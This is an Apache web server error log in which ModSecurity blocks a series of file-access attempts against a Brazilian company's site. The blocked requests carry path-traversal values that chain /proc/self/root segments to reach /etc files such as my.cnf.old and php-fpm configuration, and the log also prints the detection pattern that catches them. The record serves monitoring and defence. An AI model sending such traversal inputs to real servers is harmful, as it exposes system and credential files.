[Fri Mar 20 12:35:50.174348 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:57576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pVgF0L0L-SsrnPo6jBAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:35:55.421282 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:49516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pWvXLqtnMIWvjpaLYrAAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:35:57.161951 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.243.128:55596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pXQF0L0L-SsrnPo6jDQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:59.542394 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:55612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pXxCii7xarUs8iHamSwAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:36:03.214357 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:46316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pY-oXxyEfFpUF8f-60wAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:36:08.501847 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:46324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1paPqxLDW4GITHUkQm7wAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:13.366778 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.244.43:55648] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1pbV1pVZ5mVmJwsFNplwAAAFY"]
[Fri Mar 20 12:36:13.493300 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.243.128:38436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pbfHIg5MgXLBnicMvegAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:14.863889 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:38444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pbta6ubjKNq_cu4YZJgAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:36:20.078885 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.243.128:38448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pdBCii7xarUs8iHambQAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:36:24.372643 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:36092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1peF1pVZ5mVmJwsFNppAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:25.815572 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.243.128:36106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1peQF0L0L-SsrnPo6jJgAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:26.255286 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.241.31:57594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pevXLqtnMIWvjpaLY3QAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:26.257880 2026] [mime_magic:error] [pid 21219:tid 140411716749056] (70014)End of file found: [client 74.7.241.31:57594] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:26.923497 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:33750] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:36:27.221811 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:41918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pe9a6ubjKNq_cu4YZLwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:29.567343 2026] [mime_magic:error] [pid 9818:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:33958] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:36:32.174145 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:36114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pfvHIg5MgXLBnicMvlAAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:36:32.183049 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.241.31:33524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pfjJ3M9BSuKP7CAZl-gAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:33.866875 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:33534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pgeoXxyEfFpUF8f-6_AAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:33.955385 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.59:34232] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1pgV1pVZ5mVmJwsFNpsQAAAEY"]
[Fri Mar 20 12:36:34.495087 2026] [mime_magic:error] [pid 7235:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:34276] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:36:37.024083 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:33086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1phfqxLDW4GITHUkQnLQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:36:38.659857 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:33550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1phuoXxyEfFpUF8f-7AAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:40.616679 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:33092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1piPqxLDW4GITHUkQnOgAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
